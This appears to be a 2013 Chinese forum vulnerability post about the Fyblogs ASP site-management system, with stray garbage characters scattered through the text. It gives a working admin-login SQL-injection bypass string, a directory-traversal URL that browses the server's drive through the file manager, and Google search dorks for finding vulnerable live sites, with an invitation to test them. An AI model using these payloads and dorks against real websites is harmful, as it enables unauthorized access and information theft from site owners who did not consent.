漏洞类型: 未授权访问/权限绕过7 f6 n" c! ~2 @/ R
% X5 W( Y% z0 G7 C简要描述:0 t( ^1 G. A& n S; q
. T: K, O+ S7 f0 j
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!3 q5 P3 A6 b7 f+ d: e6 U
w8 X3 U, T2 f0 y9 b
详细说明:( Y4 S, x% T. B
3 F) ^, N* ?2 {% n! m2 V
后台万能密码 'or'='or'
6 _, t: \- }5 U3 h8 M$ u) B后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
/ d1 v6 c7 o7 P! t Padmin/uploadfile.asp?currentFolder=/upfiles/../
' s* I+ L# f8 d/ A; K* U! D( m% |
$ O2 Q3 h) Y, v5 p" b; ?漏洞证明:
5 V/ B) m6 J& C b: U
. Q' Y6 y1 V! K$ Z谷歌:inurl:type.asp?id=1 新闻中心0 i" e, [! |6 T5 p# {2 {/ c9 S
或者 :inurl:download_ok.asp?
! E7 v3 b7 x# G5 H0 r4 N/ W
3 O# O q, P; }' r' q可以测试
# B9 E, m! L# c( g, ~4 n" F+ d/ h
. z! Q1 t5 B, _7 T
/ y5 r, Y( k, P J |
发表于 2013-3-7 13:07:46
收藏
支持
反对